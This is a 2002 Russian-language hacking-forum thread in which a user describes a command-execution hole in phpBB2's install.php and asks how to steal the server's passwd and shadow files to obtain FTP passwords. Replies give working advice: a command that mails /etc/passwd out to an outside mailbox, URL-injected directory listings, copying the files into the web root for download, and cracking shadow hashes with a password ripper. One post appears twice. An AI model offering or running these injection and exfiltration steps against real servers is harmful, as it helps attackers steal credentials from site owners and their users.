Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
|
Удаленные команды.Etc/passwd или shadow 29.06.02 00:18 Число просмотров: 1366
Автор: J0ker Статус: Незарегистрированный пользователь
|
> Ситуация:
> есть баг phpBB2...выполнение команд через install.php.В
> общем выгялдет всё так:
> cmd=ls%20../%20-la - я просматриваю дерево файлов сайта.
> cmd=ls%20../../../../etc/passwd%20-la - а вот я уже вижу
> файлы shadow and passwd.
> Вопрос вот в чём:Как мне эти файл можно стянуть к
> себе???Вообще получить фтп пароли?
> з.ы.команда cat не катит вроде бы.
очень просто для passwd:
mail my@email.ru < ../../../../etc/passwd
и ты получишь файл passwd в свой ящик :)
но только - вот облом - вместо паролей там стоят звездочки :)
а вот файл shadow никто кроме рута читать не может ибо права на него - 400
да и заполучив даже shadow надо пароли еще расшифровать, что при грамотном их подборе практически невозможно :)
|
|
<hacking>
|
Удаленные команды.Etc/passwd или shadow 20.06.02 20:54
Автор: -=MOBY=- Статус: Незарегистрированный пользователь
|
Ситуация:
есть баг phpBB2...выполнение команд через install.php.В общем выгялдет всё так:
cmd=ls%20../%20-la - я просматриваю дерево файлов сайта.
cmd=ls%20../../../../etc/passwd%20-la - а вот я уже вижу файлы shadow and passwd.
Вопрос вот в чём:Как мне эти файл можно стянуть к себе???Вообще получить фтп пароли?
з.ы.команда cat не катит вроде бы.
|
|
Удаленные команды.Etc/passwd или shadow 03.07.02 07:29
Автор: Зюзя Статус: Незарегистрированный пользователь
|
> Ситуация:
> есть баг phpBB2...выполнение команд через install.php.В
> общем выгялдет всё так:
> cmd=ls%20../%20-la - я просматриваю дерево файлов сайта.
> cmd=ls%20../../../../etc/passwd%20-la - а вот я уже вижу
> файлы shadow and passwd.
> Вопрос вот в чём:Как мне эти файл можно стянуть к
> себе???Вообще получить фтп пароли?
> з.ы.команда cat не катит вроде бы.
поступило предложение просто % поставить %Qa и пехнуть всю бодягу
в бровзер в любимый(луче lynx) ну вот и лецизрей свой фаил...
если там админ не зюзя то хрен ты чего полцчиш (кроме списков юзеров и их UID i GID а как заметил там оди таварищ порольчики то будут ":x:" все.
так тырь луче shadow и поседи с какимнибуть рипером... и всё у тебя будит через пару суток
щасьтья и мир в ваш дом!
|
|
Удаленные команды.Etc/passwd или shadow 29.06.02 00:18
Автор: J0ker Статус: Незарегистрированный пользователь
|
> Ситуация:
> есть баг phpBB2...выполнение команд через install.php.В
> общем выгялдет всё так:
> cmd=ls%20../%20-la - я просматриваю дерево файлов сайта.
> cmd=ls%20../../../../etc/passwd%20-la - а вот я уже вижу
> файлы shadow and passwd.
> Вопрос вот в чём:Как мне эти файл можно стянуть к
> себе???Вообще получить фтп пароли?
> з.ы.команда cat не катит вроде бы.
очень просто для passwd:
mail my@email.ru < ../../../../etc/passwd
и ты получишь файл passwd в свой ящик :)
но только - вот облом - вместо паролей там стоят звездочки :)
а вот файл shadow никто кроме рута читать не может ибо права на него - 400
да и заполучив даже shadow надо пароли еще расшифровать, что при грамотном их подборе практически невозможно :)
|
|
Удаленные команды.Etc/passwd или shadow 22.06.02 12:29
Автор: werty Статус: Незарегистрированный пользователь
|
> Ситуация:
> есть баг phpBB2...выполнение команд через install.php.В
> общем выгялдет всё так:
> cmd=ls%20../%20-la - я просматриваю дерево файлов сайта.
> cmd=ls%20../../../../etc/passwd%20-la - а вот я уже вижу
> файлы shadow and passwd.
> Вопрос вот в чём:Как мне эти файл можно стянуть к
> себе???Вообще получить фтп пароли?
> з.ы.команда cat не катит вроде бы.
дык если ты можешь просмотреть верхний уровень каталогов, то поидее или веб запущен под ротум , но значит ты без проблем сможешь их просмотреть cat"ом , но если не пускает, то попробуй постаринке перекинь их в веб дерикторию, а там копируй их через браузер, но врядли получиться , если веб не под рутом.
|
|
|
подробно о проекте
Анализ криптографических сетевых...
